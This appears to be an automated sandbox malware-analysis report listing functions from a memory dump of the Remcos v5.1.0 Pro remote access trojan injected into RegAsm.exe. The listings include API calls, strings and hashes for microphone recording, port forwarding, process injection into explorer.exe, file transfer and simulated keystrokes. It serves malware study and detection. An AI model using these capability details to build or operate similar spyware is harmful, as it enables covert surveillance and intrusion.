                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Eventinet_ntoa
                                                          • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse$NG
                                                          • API String ID: 3578746661-3604713145
                                                          • Opcode ID: b0b6dcaede0a5adf9c5b96f0b4e809d1309e3a965782396cd2d372e65062e622
                                                          • Instruction ID: 71dfdc03858149a45142756d2b421c0b7bbb6d70992310a40494c7f1f0681c69
                                                          • Opcode Fuzzy Hash: b0b6dcaede0a5adf9c5b96f0b4e809d1309e3a965782396cd2d372e65062e622
                                                          • Instruction Fuzzy Hash: 0051C131A042015BC614FB36C91AAAE37A5AB85344F40453FF906A76F1EF7C8985C7DE
                                                          Function 00455F04 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 154COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,00456FFF), ref: 00455F27
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: DecodePointer
                                                          • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                          • API String ID: 3527080286-3064271455
                                                          • Opcode ID: 629998c7ca290600fade91f32205cb7004f8bc569fe6c3e827db03ba52e3cc78
                                                          • Instruction ID: ff4fc8d1aadbe784407353d8516796ad37925c88dabf63da6293f70e8270e0de
                                                          • Opcode Fuzzy Hash: 629998c7ca290600fade91f32205cb7004f8bc569fe6c3e827db03ba52e3cc78
                                                          • Instruction Fuzzy Hash: 16519F71900909CBCF10CF58E9485BEBBB0FF49306FA14197D841A73A6DB399D298B1E
                                                          Function 00417495 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 104sleepfileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 004174F5
                                                            • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A843), ref: 0041C49E
                                                          • Sleep.KERNEL32(00000064), ref: 00417521
                                                          • DeleteFileW.KERNEL32(00000000), ref: 00417555
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: File$CreateDeleteExecuteShellSleep
                                                          • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                                                          • API String ID: 1462127192-2001430897
                                                          • Opcode ID: f8410daf8611d6dd58e1b86e5ccb1e64fac469e803ba3f11ccb0ef9c9bbe0734
                                                          • Instruction ID: 51d64fe7c8a5c54eac4555a52c350958ac4104e8f54c8767ba2a87230734c78e
                                                          • Opcode Fuzzy Hash: f8410daf8611d6dd58e1b86e5ccb1e64fac469e803ba3f11ccb0ef9c9bbe0734
                                                          • Instruction Fuzzy Hash: 1431307194011A9ADB04FB62DC96DED7779AF50309F40017EF606730E2EF785A8ACA9C
                                                          Function 004073AC Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 99COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetCurrentProcess.KERNEL32(00472B14,00000000,004752D8,00003000,00000004,00000000,00000001), ref: 004073DD
                                                          • GetCurrentProcess.KERNEL32(00472B14,00000000,00008000,?,00000000,00000001,00000000,00407656,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe), ref: 0040749E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CurrentProcess
                                                          • String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir
                                                          • API String ID: 2050909247-4242073005
                                                          • Opcode ID: 105ebb0f8990cefe91757f1d0024cf73e91af1221990972c55416f3ee457c51f
                                                          • Instruction ID: f630994b7aed3d2c1b9b8fa2b3e4f68b22e8b08ead4833dea6669ff7d567ef23
                                                          • Opcode Fuzzy Hash: 105ebb0f8990cefe91757f1d0024cf73e91af1221990972c55416f3ee457c51f
                                                          • Instruction Fuzzy Hash: 7031A471A04700ABD321FF65ED46F167BB8AB44305F10087EF515A6292E7B8B8448B6F
                                                          Function 00401D0B Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 89COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • _strftime.LIBCMT ref: 00401D50
                                                            • Part of subcall function 00401A6D: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
                                                          • waveInUnprepareHeader.WINMM(00472A88,00000020,00000000,?), ref: 00401E02
                                                          • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401E40
                                                          • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401E4F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                                                          • String ID: %Y-%m-%d %H.%M$.wav$dMG$|MG
                                                          • API String ID: 3809562944-243156785
                                                          • Opcode ID: ad8ba90a2921d66a3c12ccf8c1a2d8e4c0e0e91c69b7ff21a65ebece821e0ee7
                                                          • Instruction ID: 027c37fd5a1300b84eaed5fd93cda356eabc1c7fedb6cd9f381e221a57c36ff8
                                                          • Opcode Fuzzy Hash: ad8ba90a2921d66a3c12ccf8c1a2d8e4c0e0e91c69b7ff21a65ebece821e0ee7
                                                          • Instruction Fuzzy Hash: 383181315043019FC324EB21DD46A9A77A8EB84314F40443EF18DA21F2EFB89A49CB5E
                                                          Function 00410E61 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 75COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 00410E6E
                                                          • int.LIBCPMT ref: 00410E81
                                                            • Part of subcall function 0040E0C1: std::_Lockit::_Lockit.LIBCPMT ref: 0040E0D2
                                                            • Part of subcall function 0040E0C1: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E0EC
                                                          • std::_Facet_Register.LIBCPMT ref: 00410EC1
                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 00410ECA
                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 00410EE8
                                                          • __Init_thread_footer.LIBCMT ref: 00410F29
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_Init_thread_footerRegisterThrow
                                                          • String ID: ,kG$0kG
                                                          • API String ID: 3815856325-2015055088
                                                          • Opcode ID: e0f3714a3daeaf8b288ae2a542907f179217b7f89c568a0a8b7367a1e9159da3
                                                          • Instruction ID: 12cf7b7900226bd12227407fb3b1cbab205c4dd0745ae636880afd2a72082c2f
                                                          • Opcode Fuzzy Hash: e0f3714a3daeaf8b288ae2a542907f179217b7f89c568a0a8b7367a1e9159da3
                                                          • Instruction Fuzzy Hash: 162134329005249BC704EB6AD9428DE37A8EF48324F20056FF804A72D1DBB9AD81CB9D
                                                          Function 00401BE9 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 71COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00401BF9
                                                          • waveInOpen.WINMM(00472AC0,000000FF,00472AA8,Function_00001D0B,00000000,00000000,00000024), ref: 00401C8F
                                                          • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401CE3
                                                          • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401CF2
                                                          • waveInStart.WINMM ref: 00401CFE
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                                                          • String ID: dMG$|MG$PG
                                                          • API String ID: 1356121797-532278878
                                                          • Opcode ID: f67d326050ea03177529252cfca037bf538e61c655dad41bf55bf31ac8308c8f
                                                          • Instruction ID: ba088f7df0b955e0db37e5e5e2d8d6799d5f59e9c832501e8260ac80857d70f0
                                                          • Opcode Fuzzy Hash: f67d326050ea03177529252cfca037bf538e61c655dad41bf55bf31ac8308c8f
                                                          • Instruction Fuzzy Hash: 53212A71604201AFC739DF6AEE15A6A7BB6FB94715B00803FA10DD76B1DBB84881CB5C
                                                          Function 0041D45D Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 48windowstringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041D476
                                                            • Part of subcall function 0041D50F: RegisterClassExA.USER32(00000030), ref: 0041D55B
                                                            • Part of subcall function 0041D50F: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041D576
                                                            • Part of subcall function 0041D50F: GetLastError.KERNEL32 ref: 0041D580
                                                          • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041D4AD
                                                          • lstrcpynA.KERNEL32(00474B60,Remcos,00000080), ref: 0041D4C7
                                                          • Shell_NotifyIconA.SHELL32(00000000,00474B48), ref: 0041D4DD
                                                          • TranslateMessage.USER32(?), ref: 0041D4E9
                                                          • DispatchMessageA.USER32(?), ref: 0041D4F3
                                                          • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0041D500
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                                          • String ID: Remcos
                                                          • API String ID: 1970332568-165870891
                                                          • Opcode ID: e379e7694b2aceffa08d25cf1e7e1f0c4c43df4e14370d432b5b71655a4afb2b
                                                          • Instruction ID: 4ccd8a34d55b2cf311069b5b9598b364b65d9d4e2968dcdf9eb94a5ca0393a4d
                                                          • Opcode Fuzzy Hash: e379e7694b2aceffa08d25cf1e7e1f0c4c43df4e14370d432b5b71655a4afb2b
                                                          • Instruction Fuzzy Hash: AC015271800245EBD7109FA5EC4CFEABB7CEB85705F004026F515930A1D778E885CB98
                                                          Function 0044CD80 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 984f3823f0f42f82cc4a86ce7b4d37cd777ac44a74ee2f2d7e0058df0e398b64
                                                          • Instruction ID: c2c0890efeac2311cc0422bbb5d66c498191acafde20d8af94b1f6b0c86a236e
                                                          • Opcode Fuzzy Hash: 984f3823f0f42f82cc4a86ce7b4d37cd777ac44a74ee2f2d7e0058df0e398b64
                                                          • Instruction Fuzzy Hash: 5AC1D770D04249AFEF11DFA9C881BAEBBB4EF09314F18415AE914A7392C77C9D41CB69
                                                          Function 10001CCA Relevance: 13.6, APIs: 9, Instructions: 84fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D1B
                                                          • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 10001D37
                                                          • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D4B
                                                          • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D58
                                                          • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D72
                                                          • CloseHandle.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D7D
                                                          • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D8A
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3272380901.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000004.00000002.3272320840.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3272380901.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_10000000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: File$Delete$CloseCopyCreateHandleReadSize
                                                          • String ID:
                                                          • API String ID: 1454806937-0
                                                          • Opcode ID: 95ffba8e0906de61fbf41533eef9bce15325b0b0370a179d90a4a5ca68fedbfa
                                                          • Instruction ID: 3114db45d92e83daf92c47a85baf70c14dd0292bf94a6379629bf72341f68b19
                                                          • Opcode Fuzzy Hash: 95ffba8e0906de61fbf41533eef9bce15325b0b0370a179d90a4a5ca68fedbfa
                                                          • Instruction Fuzzy Hash: 2221FCB594122CAFF710EBA08CCCFEF76ACEB08395F010566F515D2154D6709E458A70
                                                          Function 00445179 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 266COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                                            • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                                            • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                                            • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                                          • _memcmp.LIBVCRUNTIME ref: 00445423
                                                          • _free.LIBCMT ref: 00445494
                                                          • _free.LIBCMT ref: 004454AD
                                                          • _free.LIBCMT ref: 004454DF
                                                          • _free.LIBCMT ref: 004454E8
                                                          • _free.LIBCMT ref: 004454F4
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _free$ErrorLast$_abort_memcmp
                                                          • String ID: C
                                                          • API String ID: 1679612858-1037565863
                                                          • Opcode ID: 95a5055c0f5b4626ae5439ab0ac3d92ffbfe406232e79e21228b3c6dd4324b4e
                                                          • Instruction ID: 551747f29a431029642ca2aca46be5bbca0cbe6c77a4b2ed9ddfbf6361621c56
                                                          • Opcode Fuzzy Hash: 95a5055c0f5b4626ae5439ab0ac3d92ffbfe406232e79e21228b3c6dd4324b4e
                                                          • Instruction Fuzzy Hash: B2B13975A016199BEB24DF18C884BAEB7B4FF08308F5045EEE949A7351E774AE90CF44
                                                          Function 0041490A Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 225COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: tcp$udp
                                                          • API String ID: 0-3725065008
                                                          • Opcode ID: 856ac91ac91911106c473792f8c7d8f31027b78cae10ba96d9f0cbb069fdbf0d
                                                          • Instruction ID: c6aeaafd44a905d145cb4251883953767b251f71b123717361be5a5837da4da2
                                                          • Opcode Fuzzy Hash: 856ac91ac91911106c473792f8c7d8f31027b78cae10ba96d9f0cbb069fdbf0d
                                                          • Instruction Fuzzy Hash: 637177B06083028FDB24CF65C480BABB7E4AFD4395F15442FF88986351E778DD858B9A
                                                          Function 0040186A Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 142threadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • __Init_thread_footer.LIBCMT ref: 004018BE
                                                          • ExitThread.KERNEL32 ref: 004018F6
                                                          • waveInUnprepareHeader.WINMM(?,00000020,00000000,?,00000020,00474EE0,00000000), ref: 00401A04
                                                            • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
                                                          • String ID: PkG$XMG$NG$NG
                                                          • API String ID: 1649129571-3151166067
                                                          • Opcode ID: 856b2a5f3568ea0699b2e44769f1b54aa8307209e3fc8d56d276bdd61831f207
                                                          • Instruction ID: 5b8630810f78da979eb204bf693be1d55f2004797ab3201abec5cd50ea38d472
                                                          • Opcode Fuzzy Hash: 856b2a5f3568ea0699b2e44769f1b54aa8307209e3fc8d56d276bdd61831f207
                                                          • Instruction Fuzzy Hash: BF41B4312042109BC324FB26DD96ABE73A6AB85314F00453FF54AA61F2DF386D49C75E
                                                          Function 00407963 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 102fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00000000,00474EE0,00465FA4,?,00000000,00407FFC,00000000), ref: 004079C5
                                                          • WriteFile.KERNEL32(00000000,?,00000000,000186A0,00000000,?,000186A0,?,?,00000000,00407FFC,00000000,?,?,0000000A,00000000), ref: 00407A0D
                                                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                          • CloseHandle.KERNEL32(00000000,?,00000000,00407FFC,00000000,?,?,0000000A,00000000), ref: 00407A4D
                                                          • MoveFileW.KERNEL32(00000000,00000000), ref: 00407A6A
                                                          • CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407A95
                                                          • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407AA5
                                                            • Part of subcall function 00404B96: WaitForSingleObject.KERNEL32(00000000,000000FF,?,00474EF8,00404C49,00000000,00000000,00000000,?,00474EF8,?), ref: 00404BA5
                                                            • Part of subcall function 00404B96: SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040548B), ref: 00404BC3
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                                                          • String ID: .part
                                                          • API String ID: 1303771098-3499674018
                                                          • Opcode ID: d230553aec7110adf4e51ba4941b1d94ecbe35f1f5eea66a9c4207c894b51e14
                                                          • Instruction ID: 3872d967715c28256f57216ae0d43a20e9ded80e7ed52efebe816600842ab993
                                                          • Opcode Fuzzy Hash: d230553aec7110adf4e51ba4941b1d94ecbe35f1f5eea66a9c4207c894b51e14
                                                          • Instruction Fuzzy Hash: 7F318371508341AFC210EB21DC4599FB7A8FF94359F00493EB545A2192EB78EE48CB9A
                                                          Function 0041CD9B Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 48memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • AllocConsole.KERNEL32(00475338), ref: 0041CDA4
                                                          • GetConsoleWindow.KERNEL32 ref: 0041CDAA
                                                          • ShowWindow.USER32(00000000,00000000), ref: 0041CDBD
                                                          • SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CDE2
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Console$Window$AllocOutputShow
                                                          • String ID: Remcos v$5.1.0 Pro$CONOUT$
                                                          • API String ID: 4067487056-1043272453
                                                          • Opcode ID: 7204a5bae693ec2f4884850c6238c56aa94b879f8555490226ef59d43c8bca4e
                                                          • Instruction ID: 3d4e39fb732e2b6cb40f789e287104da8d9afdf675614735db993d10cd8ea689
                                                          • Opcode Fuzzy Hash: 7204a5bae693ec2f4884850c6238c56aa94b879f8555490226ef59d43c8bca4e
                                                          • Instruction Fuzzy Hash: CD0188719803087AD610F7F1DC8BF9D776C5B14705F6004277604A70D3E7BD9954466E
                                                          Function 0044AC49 Relevance: 12.2, APIs: 8, Instructions: 216COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,0042DD01,?,?,?,0044AE9A,00000001,00000001,?), ref: 0044ACA3
                                                          • __alloca_probe_16.LIBCMT ref: 0044ACDB
                                                          • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,0042DD01,?,?,?,0044AE9A,00000001,00000001,?), ref: 0044AD29
                                                          • __alloca_probe_16.LIBCMT ref: 0044ADC0
                                                          • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0044AE23
                                                          • __freea.LIBCMT ref: 0044AE30
                                                            • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
                                                          • __freea.LIBCMT ref: 0044AE39
                                                          • __freea.LIBCMT ref: 0044AE5E
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                                          • String ID:
                                                          • API String ID: 3864826663-0
                                                          • Opcode ID: f133f672f31cad4c1eaa5701a27b160f43f27f2d719f30c1e4d65ec3bb2f8dff
                                                          • Instruction ID: b5b01290aead076256688b5938d42e4b2a7c64905c3dece0b68445a47d4ef5f6
                                                          • Opcode Fuzzy Hash: f133f672f31cad4c1eaa5701a27b160f43f27f2d719f30c1e4d65ec3bb2f8dff
                                                          • Instruction Fuzzy Hash: 1F513A72680206AFFB258F64CC41EBF77AAEB44714F24462EFC14D6240EB38DC60875A
                                                          Function 00419993 Relevance: 12.1, APIs: 8, Instructions: 102keyboardCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 004199CC
                                                          • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 004199ED
                                                          • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 00419A0D
                                                          • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 00419A21
                                                          • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 00419A37
                                                          • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 00419A54
                                                          • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 00419A6F
                                                          • SendInput.USER32(00000001,?,0000001C,?,00000000), ref: 00419A8B
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: InputSend
                                                          • String ID:
